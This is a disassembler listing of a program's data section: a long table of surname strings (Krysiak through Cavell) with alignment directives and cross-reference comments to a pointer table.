aKrysiak db 'Krysiak',0 ; DATA XREF: .data:0042E2D0�o
aKroemer db 'Kroemer',0 ; DATA XREF: .data:0042E2CC�o
aKraus db 'Kraus',0 ; DATA XREF: .data:0042E2C8�o
align 4
aKrasney db 'Krasney',0 ; DATA XREF: .data:0042E2C4�o
aKrailo db 'Krailo',0 ; DATA XREF: .data:0042E2C0�o
align 4
aKraemer db 'Kraemer',0 ; DATA XREF: .data:0042E2BC�o
aKovaks db 'Kovaks',0 ; DATA XREF: .data:0042E2B8�o
align 4
aKotter db 'Kotter',0 ; DATA XREF: .data:0042E2B4�o
align 4
aKorzybski db 'Korzybski',0 ; DATA XREF: .data:0042E2B0�o
align 10h
aKool db 'Kool',0 ; DATA XREF: .data:0042E2AC�o
align 4
aKonrad db 'Konrad',0 ; DATA XREF: .data:0042E2A8�o
align 10h
aKoniaris db 'Koniaris',0 ; DATA XREF: .data:0042E2A4�o
align 4
aKommer db 'Kommer',0 ; DATA XREF: .data:0042E2A0�o
align 4
aKoivumaki db 'Koivumaki',0 ; DATA XREF: .data:0042E29C�o
align 10h
aKohn db 'Kohn',0 ; DATA XREF: .data:0042E298�o
align 4
aKoch db 'Koch',0 ; DATA XREF: .data:0042E294�o
align 10h
aKobrick db 'Kobrick',0 ; DATA XREF: .data:0042E290�o
aKnuff db 'Knuff',0 ; DATA XREF: .data:0042E28C�o
align 10h
aKlint db 'Klint',0 ; DATA XREF: .data:0042E288�o
align 4
aKlinkenborg db 'Klinkenborg',0 ; DATA XREF: .data:0042E284�o
aKling db 'Kling',0 ; DATA XREF: .data:0042E280�o
align 4
aKlemperer db 'Klemperer',0 ; DATA XREF: .data:0042E27C�o
align 4
aKleinfelder db 'Kleinfelder',0 ; DATA XREF: .data:0042E278�o
aKleiman db 'Kleiman',0 ; DATA XREF: .data:0042E274�o
aKleckner db 'Kleckner',0 ; DATA XREF: .data:0042E270�o
align 4
aKittridge db 'Kittridge',0 ; DATA XREF: .data:0042E26C�o
align 4
aKirscht db 'Kirscht',0 ; DATA XREF: .data:0042E268�o
aKippenberger db 'Kippenberger',0 ; DATA XREF: .data:0042E264�o
align 4
aKinsley db 'Kinsley',0 ; DATA XREF: .data:0042E260�o
aKindall db 'Kindall',0 ; DATA XREF: .data:0042E25C�o
aKimura db 'Kimura',0 ; DATA XREF: .data:0042E258�o
align 4
aKimmett db 'Kimmett',0 ; DATA XREF: .data:0042E254�o
aKimmel db 'Kimmel',0 ; DATA XREF: .data:0042E250�o
align 4
aKhong db 'Khong',0 ; DATA XREF: .data:0042E24C�o
align 4
aKeul db 'Keul',0 ; DATA XREF: .data:0042E248�o
align 4
aKerry db 'Kerry',0 ; DATA XREF: .data:0042E244�o
align 4
aKendall db 'Kendall',0 ; DATA XREF: .data:0042E240�o
aKemsley db 'Kemsley',0 ; DATA XREF: .data:0042E23C�o
aKempton db 'Kempton',0 ; DATA XREF: .data:0042E238�o
aKelsey db 'Kelsey',0 ; DATA XREF: .data:0042E234�o
align 4
aKelker db 'Kelker',0 ; DATA XREF: .data:0042E230�o
align 4
aKeith db 'Keith',0 ; DATA XREF: .data:0042E22C�o
align 4
aKeepper db 'Keepper',0 ; DATA XREF: .data:0042E228�o
aKeenan db 'Keenan',0 ; DATA XREF: .data:0042E224�o
align 4
aKee db 'Kee',0 ; DATA XREF: .data:0042E220�o
aKawachi db 'Kawachi',0 ; DATA XREF: .data:0042E21C�o
aKasten db 'Kasten',0 ; DATA XREF: .data:0042E218�o
align 10h
aKassower db 'Kassower',0 ; DATA XREF: .data:0042E214�o
align 4
aKarpouzes db 'Karpouzes',0 ; DATA XREF: .data:0042E210�o
align 4
aKangis db 'Kangis',0 ; DATA XREF: .data:0042E20C�o
align 10h
aKamel db 'Kamel',0 ; DATA XREF: .data:0042E208�o
align 4
aKalman db 'Kalman',0 ; DATA XREF: .data:0042E204�o
align 10h
aKalinowski db 'Kalinowski',0 ; DATA XREF: .data:0042E200�o
align 4
aKalil db 'Kalil',0 ; DATA XREF: .data:0042E1FC�o
align 4
aKaligian db 'Kaligian',0 ; DATA XREF: .data:0042E1F8�o
align 10h
aKalbfleisch db 'Kalbfleisch',0 ; DATA XREF: .data:0042E1F4�o
aKafadar db 'Kafadar',0 ; DATA XREF: .data:0042E1F0�o
aKaboolian db 'Kaboolian',0 ; DATA XREF: .data:0042E1EC�o
align 10h
aKabbash db 'Kabbash',0 ; DATA XREF: .data:0042E1E8�o
aJulious db 'Julious',0 ; DATA XREF: .data:0042E1E4�o
aJuliano db 'Juliano',0 ; DATA XREF: .data:0042E1E0�o
aJucks db 'Jucks',0 ; DATA XREF: .data:0042E1DC�o
align 10h
aJorgensen db 'Jorgensen',0 ; DATA XREF: .data:0042E1D8�o
align 4
aJolly db 'Jolly',0 ; DATA XREF: .data:0042E1D4�o
align 4
aJohns db 'Johns',0 ; DATA XREF: .data:0042E1D0�o
align 4
aJohannsen db 'Johannsen',0 ; DATA XREF: .data:0042E1CC�o
align 4
aJohannesson db 'Johannesson',0 ; DATA XREF: .data:0042E1C8�o
aJewett db 'Jewett',0 ; DATA XREF: .data:0042E1C4�o
align 4
aJespersen db 'Jespersen',0 ; DATA XREF: .data:0042E1C0�o
align 4
aJenkins db 'Jenkins',0 ; DATA XREF: .data:0042E1BC�o
aJellis db 'Jellis',0 ; DATA XREF: .data:0042E1B8�o
align 4
aJeffers db 'Jeffers',0 ; DATA XREF: .data:0042E1B4�o
aJay db 'Jay',0 ; DATA XREF: .data:0042E1B0�o
aJarrell db 'Jarrell',0 ; DATA XREF: .data:0042E1AC�o
aJarnagin db 'Jarnagin',0 ; DATA XREF: .data:0042E1A8�o
align 4
aJanjigian db 'Janjigian',0 ; DATA XREF: .data:0042E1A4�o
align 4
aJamil db 'Jamil',0 ; DATA XREF: .data:0042E1A0�o
align 4
aJain db 'Jain',0 ; DATA XREF: .data:0042E19C�o
align 4
aJagoe db 'Jagoe',0 ; DATA XREF: .data:0042E198�o
align 4
aJagger db 'Jagger',0 ; DATA XREF: .data:0042E194�o
align 4
aJagers db 'Jagers',0 ; DATA XREF: .data:0042E190�o
align 4
aJackson db 'Jackson',0 ; DATA XREF: .data:0042E18C�o
aJacenko db 'Jacenko',0 ; DATA XREF: .data:0042E188�o
aIyer db 'Iyer',0 ; DATA XREF: .data:0042E184�o
align 4
aIsserman db 'Isserman',0 ; DATA XREF: .data:0042E180�o
align 10h
aIsbill db 'Isbill',0 ; DATA XREF: .data:0042E17C�o
align 4
aIsaievych db 'Isaievych',0 ; DATA XREF: .data:0042E178�o
align 4
aIsaac db 'Isaac',0 ; DATA XREF: .data:0042E174�o
align 4
aInniss db 'Inniss',0 ; DATA XREF: .data:0042E170�o
align 4
aInamura db 'Inamura',0 ; DATA XREF: .data:0042E16C�o
aIgarashi db 'Igarashi',0 ; DATA XREF: .data:0042E168�o
align 4
aIchikawa db 'Ichikawa',0 ; DATA XREF: .data:0042E164�o
align 4
aIaquinta db 'Iaquinta',0 ; DATA XREF: .data:0042E160�o
align 10h
aHyde db 'Hyde',0 ; DATA XREF: .data:0042E15C�o
align 4
aHutchings db 'Hutchings',0 ; DATA XREF: .data:0042E158�o
align 4
aHurtubise db 'Hurtubise',0 ; DATA XREF: .data:0042E154�o
align 10h
aHupp db 'Hupp',0 ; DATA XREF: .data:0042E150�o
align 4
aHuntington db 'Huntington',0 ; DATA XREF: .data:0042E14C�o
align 4
aHungerford db 'Hungerford',0 ; DATA XREF: .data:0042E148�o
align 10h
aHuidekoper db 'Huidekoper',0 ; DATA XREF: .data:0042E144�o
align 4
aHuey db 'Huey',0 ; DATA XREF: .data:0042E140�o
align 4
aHoy db 'Hoy',0 ; DATA XREF: .data:0042E13C�o
aHoward db 'Howard',0 ; DATA XREF: .data:0042E138�o
align 10h
aHottle db 'Hottle',0 ; DATA XREF: .data:0042E134�o
align 4
aHostage db 'Hostage',0 ; DATA XREF: .data:0042E130�o
aHoshida db 'Hoshida',0 ; DATA XREF: .data:0042E12C�o
aHorsley db 'Horsley',0 ; DATA XREF: .data:0042E128�o
aHopkins db 'Hopkins',0 ; DATA XREF: .data:0042E124�o
aHooker db 'Hooker',0 ; DATA XREF: .data:0042E120�o
align 10h
aHolzman db 'Holzman',0 ; DATA XREF: .data:0042E11C�o
aHolway db 'Holway',0 ; DATA XREF: .data:0042E118�o
align 10h
aHolter db 'Holter',0 ; DATA XREF: .data:0042E114�o
align 4
aHoloien db 'Holoien',0 ; DATA XREF: .data:0042E110�o
aHolmes db 'Holmes',0 ; DATA XREF: .data:0042E10C�o
align 4
aHokoda db 'Hokoda',0 ; DATA XREF: .data:0042E108�o
align 10h
aHokanson db 'Hokanson',0 ; DATA XREF: .data:0042E104�o
align 4
aHoffman db 'Hoffman',0 ; DATA XREF: .data:0042E100�o
aHoffer db 'Hoffer',0 ; DATA XREF: .data:0042E0FC�o
align 4
aHock db 'Hock',0 ; DATA XREF: .data:0042E0F8�o
align 4
aHoang db 'Hoang',0 ; DATA XREF: .data:0042E0F4�o
align 4
aHitchcock db 'Hitchcock',0 ; DATA XREF: .data:0042E0F0�o
align 4
aHirst db 'Hirst',0 ; DATA XREF: .data:0042E0EC�o
align 10h
aHind db 'Hind',0 ; DATA XREF: .data:0042E0E8�o
align 4
aHimmelfarb db 'Himmelfarb',0 ; DATA XREF: .data:0042E0E4�o
align 4
aHeyeck db 'Heyeck',0 ; DATA XREF: .data:0042E0E0�o
align 4
aHeubert db 'Heubert',0 ; DATA XREF: .data:0042E0DC�o
aHester db 'Hester',0 ; DATA XREF: .data:0042E0D8�o
align 4
aHerrera db 'Herrera',0 ; DATA XREF: .data:0042E0D4�o
aHernandez db 'Hernandez',0 ; DATA XREF: .data:0042E0D0�o
align 10h
aHenrichs db 'Henrichs',0 ; DATA XREF: .data:0042E0CC�o
align 4
aHenery db 'Henery',0 ; DATA XREF: .data:0042E0C8�o
align 4
aHemphill db 'Hemphill',0 ; DATA XREF: .data:0042E0C4�o
align 10h
aHelprin db 'Helprin',0 ; DATA XREF: .data:0042E0C0�o
aHellmiss db 'Hellmiss',0 ; DATA XREF: .data:0042E0BC�o
align 4
aHellman db 'Hellman',0 ; DATA XREF: .data:0042E0B8�o
aHeiland db 'Heiland',0 ; DATA XREF: .data:0042E0B4�o
aHeft db 'Heft',0 ; DATA XREF: .data:0042E0B0�o
align 4
aHeermans db 'Heermans',0 ; DATA XREF: .data:0042E0AC�o
align 4
aHazlewood db 'Hazlewood',0 ; DATA XREF: .data:0042E0A8�o
align 4
aHaynes db 'Haynes',0 ; DATA XREF: .data:0042E0A4�o
align 4
aHayes db 'Hayes',0 ; DATA XREF: .data:0042E0A0�o
align 4
aHawkes db 'Hawkes',0 ; DATA XREF: .data:0042E09C�o
align 4
aHaviaras db 'Haviaras',0 ; DATA XREF: .data:0042E098�o
align 4
aHarwell db 'Harwell',0 ; DATA XREF: .data:0042E094�o
aHartnett db 'Hartnett',0 ; DATA XREF: .data:0042E090�o
align 4
aHartmann db 'Hartmann',0 ; DATA XREF: .data:0042E08C�o
align 4
aHartman db 'Hartman',0 ; DATA XREF: .data:0042E088�o
aHarrigan db 'Harrigan',0 ; DATA XREF: .data:0042E084�o
align 4
aHarlow db 'Harlow',0 ; DATA XREF: .data:0042E080�o
align 4
aHargraves db 'Hargraves',0 ; DATA XREF: .data:0042E07C�o
align 10h
aHarding db 'Harding',0 ; DATA XREF: .data:0042E078�o
aHanssen db 'Hanssen',0 ; DATA XREF: .data:0042E074�o
aHand db 'Hand',0 ; DATA XREF: .data:0042E070�o
align 4
aHammerness db 'Hammerness',0 ; DATA XREF: .data:0042E06C�o
align 4
aHamer db 'Hamer',0 ; DATA XREF: .data:0042E068�o
align 4
aHambarzumjan db 'Hambarzumjan',0 ; DATA XREF: .data:0042E064�o
align 4
aHalpert db 'Halpert',0 ; DATA XREF: .data:0042E060�o
aHallowell db 'Hallowell',0 ; DATA XREF: .data:0042E05C�o
align 10h
aHalkias db 'Halkias',0 ; DATA XREF: .data:0042E058�o
aHaley db 'Haley',0 ; DATA XREF: .data:0042E054�o
align 10h
aHackshaw db 'Hackshaw',0 ; DATA XREF: .data:0042E050�o
align 4
aHackman db 'Hackman',0 ; DATA XREF: .data:0042E04C�o
aHaar db 'Haar',0 ; DATA XREF: .data:0042E048�o
align 4
aHa db 'Ha',0 ; DATA XREF: .data:0042E044�o
align 10h
aGuo db 'Guo',0 ; DATA XREF: .data:0042E040�o
aGunn db 'Gunn',0 ; DATA XREF: .data:0042E03C�o
align 4
aGuenthart db 'Guenthart',0 ; DATA XREF: .data:0042E038�o
align 4
aGruppe db 'Gruppe',0 ; DATA XREF: .data:0042E034�o
align 10h
aGruner db 'Gruner',0 ; DATA XREF: .data:0042E030�o
align 4
aGrummell db 'Grummell',0 ; DATA XREF: .data:0042E02C�o
align 4
aGrigoletto db 'Grigoletto',0 ; DATA XREF: .data:0042E028�o
align 10h
aGriffiths db 'Griffiths',0 ; DATA XREF: .data:0042E024�o
align 4
aGreenfeld db 'Greenfeld',0 ; DATA XREF: .data:0042E020�o
align 4
aGreenberg db 'Greenberg',0 ; DATA XREF: .data:0042E01C�o
align 4
aGravell db 'Gravell',0 ; DATA XREF: .data:0042E018�o
aGozzi db 'Gozzi',0 ; DATA XREF: .data:0042E014�o
align 4
aGoody db 'Goody',0 ; DATA XREF: .data:0042E010�o
align 4
aGoodearl db 'Goodearl',0 ; DATA XREF: .data:0042E00C�o
align 4
aGood db 'Good',0 ; DATA XREF: .data:0042E008�o
align 10h
aGoncalves db 'Goncalves',0 ; DATA XREF: .data:0042E004�o
align 4
aGoldfarb db 'Goldfarb',0 ; DATA XREF: .data:0042E000�o
align 4
aGlendon db 'Glendon',0 ; DATA XREF: .data:0042DFFC�o
aGlegg db 'Glegg',0 ; DATA XREF: .data:0042DFF8�o
align 4
aGleason db 'Gleason',0 ; DATA XREF: .data:0042DFF4�o
aGist db 'Gist',0 ; DATA XREF: .data:0042DFF0�o
align 4
aGillispie db 'Gillispie',0 ; DATA XREF: .data:0042DFEC�o
align 4
aGill db 'Gill',0 ; DATA XREF: .data:0042DFE8�o
align 4
aGili db 'Gili',0 ; DATA XREF: .data:0042DFE4�o
align 4
aGilbert db 'Gilbert',0 ; DATA XREF: .data:0042DFE0�o
aGibson db 'Gibson',0 ; DATA XREF: .data:0042DFDC�o
align 4
aGibbens db 'Gibbens',0 ; DATA XREF: .data:0042DFD8�o
aGhorai db 'Ghorai',0 ; DATA XREF: .data:0042DFD4�o
align 4
aGerrett db 'Gerrett',0 ; DATA XREF: .data:0042DFD0�o
aGeorgi db 'Georgi',0 ; DATA XREF: .data:0042DFCC�o
align 4
aGemberling db 'Gemberling',0 ; DATA XREF: .data:0042DFC8�o
align 10h
aGeller db 'Geller',0 ; DATA XREF: .data:0042DFC4�o
align 4
aGaronna db 'Garonna',0 ; DATA XREF: .data:0042DFC0�o
aGarman db 'Garman',0 ; DATA XREF: .data:0042DFBC�o
align 4
aGarfield db 'Garfield',0 ; DATA XREF: .data:0042DFB8�o
align 4
aGambini db 'Gambini',0 ; DATA XREF: .data:0042DFB4�o
aGalwey db 'Galwey',0 ; DATA XREF: .data:0042DFB0�o
align 4
aGaleotti db 'Galeotti',0 ; DATA XREF: .data:0042DFAC�o
align 10h
aGaggiotti db 'Gaggiotti',0 ; DATA XREF: .data:0042DFA8�o
align 4
aGabrielli db 'Gabrielli',0 ; DATA XREF: .data:0042DFA4�o
align 4
aFusaro db 'Fusaro',0 ; DATA XREF: .data:0042DFA0�o
align 10h
aFurth db 'Furth',0 ; DATA XREF: .data:0042DF9C�o
align 4
aFuller db 'Fuller',0 ; DATA XREF: .data:0042DF98�o
align 10h
aFujiiAbe db 'Fujii-Abe',0 ; DATA XREF: .data:0042DF94�o
align 4
aFrye db 'Frye',0 ; DATA XREF: .data:0042DF90�o
align 4
aFryberger db 'Fryberger',0 ; DATA XREF: .data:0042DF8C�o
align 10h
aFrowiss db 'Frowiss',0 ; DATA XREF: .data:0042DF88�o
aFrisken db 'Frisken',0 ; DATA XREF: .data:0042DF84�o
aFriedland db 'Friedland',0 ; DATA XREF: .data:0042DF80�o
align 4
aFried db 'Fried',0 ; DATA XREF: .data:0042DF7C�o
align 4
aFreundlich db 'Freundlich',0 ; DATA XREF: .data:0042DF78�o
align 10h
aFreid db 'Freid',0 ; DATA XREF: .data:0042DF74�o
align 4
aFrazierDavis db 'Frazier-Davis',0 ; DATA XREF: .data:0042DF70�o
align 4
aFranz db 'Franz',0 ; DATA XREF: .data:0042DF6C�o
align 10h
aFranklinKenea db 'Franklin-Kenea',0 ; DATA XREF: .data:0042DF68�o
align 10h
aFrancisco db 'Francisco',0 ; DATA XREF: .data:0042DF64�o
align 4
aFossi db 'Fossi',0 ; DATA XREF: .data:0042DF60�o
align 4
aFossey db 'Fossey',0 ; DATA XREF: .data:0042DF5C�o
align 4
aFortier db 'Fortier',0 ; DATA XREF: .data:0042DF58�o
aFortes db 'Fortes',0 ; DATA XREF: .data:0042DF54�o
align 4
aForester db 'Forester',0 ; DATA XREF: .data:0042DF50�o
align 4
aFolks db 'Folks',0 ; DATA XREF: .data:0042DF4C�o
align 10h
aFlores db 'Flores',0 ; DATA XREF: .data:0042DF48�o
align 4
aFlier db 'Flier',0 ; DATA XREF: .data:0042DF44�o
align 10h
aFitzmaurice db 'Fitzmaurice',0 ; DATA XREF: .data:0042DF40�o
aFisk db 'Fisk',0 ; DATA XREF: .data:0042DF3C�o
align 4
aFiorina db 'Fiorina',0 ; DATA XREF: .data:0042DF38�o
aFinnegan db 'Finnegan',0 ; DATA XREF: .data:0042DF34�o
align 4
aFinkelstein db 'Finkelstein',0 ; DATA XREF: .data:0042DF30�o
aFink db 'Fink',0 ; DATA XREF: .data:0042DF2C�o
align 4
aField db 'Field',0 ; DATA XREF: .data:0042DF28�o
align 4
aFido db 'Fido',0 ; DATA XREF: .data:0042DF24�o
align 4
aFeuer db 'Feuer',0 ; DATA XREF: .data:0042DF20�o
align 4
aFerriell db 'Ferriell',0 ; DATA XREF: .data:0042DF1C�o
align 10h
aFerrante db 'Ferrante',0 ; DATA XREF: .data:0042DF18�o
align 4
aFernandes db 'Fernandes',0 ; DATA XREF: .data:0042DF14�o
align 4
aFernald db 'Fernald',0 ; DATA XREF: .data:0042DF10�o
aFeldman db 'Feldman',0 ; DATA XREF: .data:0042DF0C�o
aFejzo db 'Fejzo',0 ; DATA XREF: .data:0042DF08�o
align 10h
aFeigenbaum db 'Feigenbaum',0 ; DATA XREF: .data:0042DF04�o
align 4
aFates db 'Fates',0 ; DATA XREF: .data:0042DF00�o
align 4
aFasso db 'Fasso',27h,0 ; DATA XREF: .data:0042DEFC�o
align 4
aFarren db 'Farren',0 ; DATA XREF: .data:0042DEF8�o
align 4
aFarone db 'Farone',0 ; DATA XREF: .data:0042DEF4�o
align 4
aFaris db 'Faris',0 ; DATA XREF: .data:0042DEF0�o
align 4
aFalorsi db 'Falorsi',0 ; DATA XREF: .data:0042DEEC�o
aFalcoAcosta db 'Falco-Acosta',0 ; DATA XREF: .data:0042DEE8�o
align 4
aFaioes db 'Faioes',0 ; DATA XREF: .data:0042DEE4�o
align 4
aFagan db 'Fagan',0 ; DATA XREF: .data:0042DEE0�o
align 4
aFabbris db 'Fabbris',0 ; DATA XREF: .data:0042DEDC�o
aEverett db 'Everett',0 ; DATA XREF: .data:0042DED8�o
aEuripides db 'Euripides',0 ; DATA XREF: .data:0042DED4�o
align 4
aEtter db 'Etter',0 ; DATA XREF: .data:0042DED0�o
align 10h
aEstes db 'Estes',0 ; DATA XREF: .data:0042DECC�o
align 4
aEspinoza db 'Espinoza',0 ; DATA XREF: .data:0042DEC8�o
align 4
aErez db 'Erez',0 ; DATA XREF: .data:0042DEC4�o
align 4
aErdos db 'Erdos',0 ; DATA XREF: .data:0042DEC0�o
align 4
aErdman db 'Erdman',0 ; DATA XREF: .data:0042DEBC�o
align 4
aErbach db 'Erbach',0 ; DATA XREF: .data:0042DEB8�o
align 4
aEppling db 'Eppling',0 ; DATA XREF: .data:0042DEB4�o
aEnyeart db 'Enyeart',0 ; DATA XREF: .data:0042DEB0�o
aEncinas db 'Encinas',0 ; DATA XREF: .data:0042DEAC�o
aElvis db 'Elvis',0 ; DATA XREF: .data:0042DEA8�o
align 4
aElmerick db 'Elmerick',0 ; DATA XREF: .data:0042DEA4�o
align 10h
aElmendorf db 'Elmendorf',0 ; DATA XREF: .data:0042DEA0�o
align 4
aEliasson db 'Eliasson',0 ; DATA XREF: .data:0042DE9C�o
align 4
aEickenhorst db 'Eickenhorst',0 ; DATA XREF: .data:0042DE98�o
aEdward db 'Edward',0 ; DATA XREF: .data:0042DE94�o
align 4
aEdner db 'Edner',0 ; DATA XREF: .data:0042DE90�o
align 4
aEdley db 'Edley',0 ; DATA XREF: .data:0042DE8C�o
align 4
aEckel db 'Eckel',0 ; DATA XREF: .data:0042DE88�o
align 4
aEbeling db 'Ebeling',0 ; DATA XREF: .data:0042DE84�o
aEardley db 'Eardley',0 ; DATA XREF: .data:0042DE80�o
aDwyer db 'Dwyer',0 ; DATA XREF: .data:0042DE7C�o
align 4
aDussault db 'Dussault',0 ; DATA XREF: .data:0042DE78�o
align 4
aDurrett db 'Durrett',0 ; DATA XREF: .data:0042DE74�o
aDuffin db 'Duffin',0 ; DATA XREF: .data:0042DE70�o
align 4
aDSouza db 'D',27h,'souza',0 ; DATA XREF: .data:0042DE6C�o
aDrinker db 'Drinker',0 ; DATA XREF: .data:0042DE68�o
aDowsland db 'Dowsland',0 ; DATA XREF: .data:0042DE64�o
align 4
aDoug db 'Doug',0 ; DATA XREF: .data:0042DE60�o
align 4
aDoty db 'Doty',0 ; DATA XREF: .data:0042DE5C�o
align 4
aDosi db 'Dosi',0 ; DATA XREF: .data:0042DE58�o
align 4
aDorf db 'Dorf',0 ; DATA XREF: .data:0042DE54�o
align 4
aDore db 'Dore',0 ; DATA XREF: .data:0042DE50�o
align 4
aDoonan db 'Doonan',0 ; DATA XREF: .data:0042DE4C�o
align 4
aDonner db 'Donner',0 ; DATA XREF: .data:0042DE48�o
align 4
aDonahue db 'Donahue',0 ; DATA XREF: .data:0042DE44�o
aDoherty db 'Doherty',0 ; DATA XREF: .data:0042DE40�o
aDockery db 'Dockery',0 ; DATA XREF: .data:0042DE3C�o
aDirksen db 'Dirksen',0 ; DATA XREF: .data:0042DE38�o
aDionysius db 'Dionysius',0 ; DATA XREF: .data:0042DE34�o
align 4
aDilworth db 'Dilworth',0 ; DATA XREF: .data:0042DE30�o
align 4
aDifronzo db 'Difronzo',0 ; DATA XREF: .data:0042DE2C�o
align 10h
aDifabio db 'Difabio',0 ; DATA XREF: .data:0042DE28�o
aDiefenbach db 'Diefenbach',0 ; DATA XREF: .data:0042DE24�o
align 4
aDicks db 'Dicks',0 ; DATA XREF: .data:0042DE20�o
align 4
aDFini db 'D',27h,'fini',0 ; DATA XREF: .data:0042DE1C�o
align 4
aDeutsch db 'Deutsch',0 ; DATA XREF: .data:0042DE18�o
aDesombre db 'Desombre',0 ; DATA XREF: .data:0042DE14�o
align 4
aDenison db 'Denison',0 ; DATA XREF: .data:0042DE10�o
aDenham db 'Denham',0 ; DATA XREF: .data:0042DE0C�o
align 4
aDenault db 'Denault',0 ; DATA XREF: .data:0042DE08�o
aDemusz db 'Demusz',0 ; DATA XREF: .data:0042DE04�o
align 4
aDempster db 'Dempster',0 ; DATA XREF: .data:0042DE00�o
align 4
aDeming db 'Deming',0 ; DATA XREF: .data:0042DDFC�o
align 4
aDellAcqua db 'Dell',27h,'acqua',0 ; DATA XREF: .data:0042DDF8�o
align 4
aDelger db 'Delger',0 ; DATA XREF: .data:0042DDF4�o
align 10h
aDeleonRendon db 'Deleon-Rendon',0 ; DATA XREF: .data:0042DDF0�o
align 10h
aDelattre db 'Delattre',0 ; DATA XREF: .data:0042DDEC�o
align 4
aDefeciani db 'Defeciani',0 ; DATA XREF: .data:0042DDE8�o
align 4
aDees db 'Dees',0 ; DATA XREF: .data:0042DDE4�o
align 10h
aDebroff db 'Debroff',0 ; DATA XREF: .data:0042DDE0�o
aDerousse db 'deRousse',0 ; DATA XREF: .data:0042DDDC�o
align 4
aDelEnclos db 'del',27h,'Enclos',0 ; DATA XREF: .data:0042DDD8�o
align 10h
aDelapena db 'DeLaPena',0 ; DATA XREF: .data:0042DDD4�o
align 4
aDegennaro db 'DeGennaro',0 ; DATA XREF: .data:0042DDD0�o
align 4
aDawkins db 'Dawkins',0 ; DATA XREF: .data:0042DDCC�o
aDavid db 'David',0 ; DATA XREF: .data:0042DDC8�o
align 4
aDaskalu db 'Daskalu',0 ; DATA XREF: .data:0042DDC4�o
aDasgupta db 'Dasgupta',0 ; DATA XREF: .data:0042DDC0�o
align 4
aDas db 'Das',0 ; DATA XREF: .data:0042DDBC�o
aDArcangelo db 'D',27h,'arcangelo',0 ; DATA XREF: .data:0042DDB8�o
aDapice db 'Dapice',0 ; DATA XREF: .data:0042DDB4�o
align 4
aDante db 'Dante',0 ; DATA XREF: .data:0042DDB0�o
align 4
aDanieli db 'Danieli',0 ; DATA XREF: .data:0042DDAC�o
aDAmbra db 'D',27h,'Ambra',0 ; DATA XREF: .data:0042DDA8�o
aDaly db 'Daly',0 ; DATA XREF: .data:0042DDA4�o
align 4
aDaldalian db 'Daldalian',0 ; DATA XREF: .data:0042DDA0�o
align 10h
aDasilva db 'daSilva',0 ; DATA XREF: .data:0042DD9C�o
aCyders db 'Cyders',0 ; DATA XREF: .data:0042DD98�o
align 10h
aCvek db 'Cvek',0 ; DATA XREF: .data:0042DD94�o
align 4
aCutler db 'Cutler',0 ; DATA XREF: .data:0042DD90�o
align 10h
aCurrier db 'Currier',0 ; DATA XREF: .data:0042DD8C�o
aCui db 'Cui',0 ; DATA XREF: .data:0042DD88�o
aCroxton db 'Croxton',0 ; DATA XREF: .data:0042DD84�o
aCroxen db 'Croxen',0 ; DATA XREF: .data:0042DD80�o
align 4
aCroshaw db 'Croshaw',0 ; DATA XREF: .data:0042DD7C�o
aCrocker db 'Crocker',0 ; DATA XREF: .data:0042DD78�o
aCrawford db 'Crawford',0 ; DATA XREF: .data:0042DD74�o
align 4
aCoutaux db 'Coutaux',0 ; DATA XREF: .data:0042DD70�o
aCounter db 'Counter',0 ; DATA XREF: .data:0042DD6C�o
aCosmides db 'Cosmides',0 ; DATA XREF: .data:0042DD68�o
align 4
aCornish db 'Cornish',0 ; DATA XREF: .data:0042DD64�o
aCorey db 'Corey',0 ; DATA XREF: .data:0042DD60�o
align 4
aConnors db 'Connors',0 ; DATA XREF: .data:0042DD5C�o
aCondodina db 'Condodina',0 ; DATA XREF: .data:0042DD58�o
align 4
aConcino db 'Concino',0 ; DATA XREF: .data:0042DD54�o
aComstock db 'Comstock',0 ; DATA XREF: .data:0042DD50�o
align 4
aCompton db 'Compton',0 ; DATA XREF: .data:0042DD48�o
; .data:0042DD4C�o
aCollis db 'Collis',0 ; DATA XREF: .data:0042DD44�o
align 4
aCollard db 'Collard',0 ; DATA XREF: .data:0042DD40�o
aColella db 'Colella',0 ; DATA XREF: .data:0042DD3C�o
aColdren db 'Coldren',0 ; DATA XREF: .data:0042DD38�o
aCoito db 'Coito',0 ; DATA XREF: .data:0042DD34�o
align 4
aCoblenz db 'Coblenz',0 ; DATA XREF: .data:0042DD30�o
aClow db 'Clow',0 ; DATA XREF: .data:0042DD2C�o
align 4
aClifton db 'Clifton',0 ; DATA XREF: .data:0042DD28�o
aClement db 'Clement',0 ; DATA XREF: .data:0042DD24�o
aClark db 'Clark',0 ; DATA XREF: .data:0042DD20�o
align 4
aClancy db 'Clancy',0 ; DATA XREF: .data:0042DD1C�o
align 4
aClaffey db 'Claffey',0 ; DATA XREF: .data:0042DD18�o
aCifarelli db 'Cifarelli',0 ; DATA XREF: .data:0042DD14�o
align 10h
aCicero db 'Cicero',0 ; DATA XREF: .data:0042DD10�o
align 4
aCiampaglia db 'Ciampaglia',0 ; DATA XREF: .data:0042DD0C�o
align 4
aChurch db 'Church',0 ; DATA XREF: .data:0042DD08�o
align 4
aChupasko db 'Chupasko',0 ; DATA XREF: .data:0042DD04�o
align 4
aChu db 'Chu',0 ; DATA XREF: .data:0042DD00�o
aChristopher db 'Christopher',0 ; DATA XREF: .data:0042DCFC�o
aChristie db 'Christie',0 ; DATA XREF: .data:0042DCF8�o
align 4
aChristiano db 'Christiano',0 ; DATA XREF: .data:0042DCF4�o
align 10h
aChristian db 'Christian',0 ; DATA XREF: .data:0042DCF0�o
align 4
aChristenson db 'Christenson',0 ; DATA XREF: .data:0042DCEC�o
aChinman db 'Chinman',0 ; DATA XREF: .data:0042DCE8�o
aChinipardaz db 'Chinipardaz',0 ; DATA XREF: .data:0042DCE4�o
aChilds db 'Childs',0 ; DATA XREF: .data:0042DCE0�o
align 4
aChildress db 'Childress',0 ; DATA XREF: .data:0042DCDC�o
align 10h
aChien db 'Chien',0 ; DATA XREF: .data:0042DCD8�o
align 4
aChiassino db 'Chiassino',0 ; DATA XREF: .data:0042DCD4�o
align 4
aChervinsky db 'Chervinsky',0 ; DATA XREF: .data:0042DCD0�o
align 10h
aCherry db 'Cherry',0 ; DATA XREF: .data:0042DCCC�o
align 4
aCheang db 'Cheang',0 ; DATA XREF: .data:0042DCC8�o
align 10h
aCharles db 'Charles',0 ; DATA XREF: .data:0042DCC4�o
aChapman db 'Chapman',0 ; DATA XREF: .data:0042DCC0�o
aCerioli db 'Cerioli',0 ; DATA XREF: .data:0042DCBC�o
aCeniceros db 'Ceniceros',0 ; DATA XREF: .data:0042DCB8�o
align 4
aCavell db 'Cavell',0 ; DATA XREF: .data:0042DCB4�o
align 4
